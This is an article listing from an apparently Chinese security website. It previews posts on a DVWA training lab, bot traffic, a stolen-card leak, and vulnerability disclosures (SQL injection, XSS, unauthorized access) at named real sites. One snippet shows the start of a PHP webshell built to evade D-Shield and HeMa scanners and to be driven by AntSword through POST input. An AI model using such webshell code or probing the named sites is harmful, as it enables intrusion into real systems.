文章列表
dvwa鉴权问题导致漏洞环境失陷
主题:dvwa鉴权问题导致漏洞环境失陷背景:某个上午,阴沉沉的天,乌云没有一丝空隙是白的,整个天空就一片乌青色。我拿着刚做好的“区域技术能力提升计划表“走向了老大,正式开始了带领小伙伴玩dvwa的第一阶段课程学习。(记着上次碰dvwa,还是给学员搭网页篡改应急培训环境的时候)。原因:简单明了
php免杀(过D盾、河马)绕assert eval post
php 7.0以上不可使用蚁剑连接 base64编码器<?php #php 7.0以下可用#密码 _POST 蚁剑 base64编码class Foo{ function Variable($c) { $name = 'Bar'; $b=$this->$name(); echo $b; echo "</br>"; echo $c; $b($c); } function Bar() {
恶意BOT大量占用服务器资源?腾讯云WAF上线BOT行为管理功能
BOT是Robot(机器人)的简称,一般指无形的虚拟机器人、软件机器人,也可以看作是自动完成某项任务的智能软件,BOT流量,即自动化程序流量。据今年6月发布的《2021 Bots自动化威胁报告》显示,2020年,Bots访问占比为57.62%。由此可以看出,在网络中BOT流量的比例已经超过“人的请求流量”。BOT流量既
100万张被盗信用卡在暗网曝光
据外媒softpedia报道,根据Threat Post的说法,一群网络罪犯建立了一个专门在线销售支付卡数据的网站--AllWorld.Cards。威胁行为者泄露了100万张被盗信用卡(收集于2018年至2019年期间)以帮助宣传他们的犯罪活动。来自Cyble的网络安全研究人员在对暗网市场和网络犯罪活动进行定期检查时发现了这一漏洞
临沂市人民医院(ly120.cn) OA存在未授权访问漏洞
临沂市人民医院(ly120.cn) OA存在未授权访问漏洞
DTCMS(dtcms.net) 主站存在反射型XSS漏洞
DTCMS(dtcms.net) 主站存在反射型XSS漏洞
wodecms(wodecms.cn) v1.1 存在SQL注入漏洞
wodecms(wodecms.cn) v1.1 存在SQL注入漏洞
wordpress(wordpress.com) plugin WP Dialog 存储型XSS跨站漏洞
wordpress(wordpress.com) plugin WP Dialog 存储型XSS跨站漏洞
中国移动(10086.cn) 某SKYwalking面板可直接访问
中国移动(10086.cn) 某SKYwalking面板可直接访问
台湾师范大学(ntnu.edu.tw) 某分站存在SQL注入漏洞
台湾师范大学(ntnu.edu.tw) 某分站存在SQL注入漏洞
